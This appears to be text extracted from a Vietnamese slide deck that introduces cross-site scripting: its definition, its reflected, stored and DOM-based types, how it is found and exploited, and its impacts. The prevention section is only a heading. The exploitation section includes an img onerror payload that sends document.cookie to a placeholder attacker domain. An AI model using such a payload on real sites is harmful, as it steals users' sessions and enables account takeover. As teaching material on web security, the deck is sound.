Professional Documents
Culture Documents
XSS
XSS
SITE
SCRIPTIN
G
01
Khái niệm Nội dung
04 Ảnh hưởng
05 Phòng chống
01
Khái niệm
Khái niệm
XSS là một lỗ hổng bảo mật web cho phép kẻ tấn
công xâm phạm các tương tác của người dùng với
một ứng dụng dễ bị tấn công thông qua các mã
script.
02
Các dạng
XSS
01 02 03
Reflected XSS Stored XSS DOM-based XSS
Chỉ thực thi được ở Mã độc được lưu vào Khai thác XSS dựa
phía client mà không cơ sở dữ liệu của trên việc thay đổi cấu
lưu vào cơ sở dữ liệu website trúc DOM
của website
03
Khai thác
XSS
Static Analysis
(Source code review)
Dynamic analysis
(Fuzzing)
Lấy cookie người dùng với
XSS
Cần có domain để kiểm soát log và lấy thông tin
<img src=x
onerror=this.src='http://domain/?'+document.cookie;>
Giả mạo yêu cầu với XSS
Khi các cookie quan trọng được set HTTP Only flag,
việc lấy cookie là không khả thi.
Có thể sử dụng XSS để giả mạo một yêu cầu của admin
như crawl dữ liệu của trang admin.
04
Ảnh hưởng
Our Partners
Keylogging Phishing
05
Phòng chống
Cách phòng tránh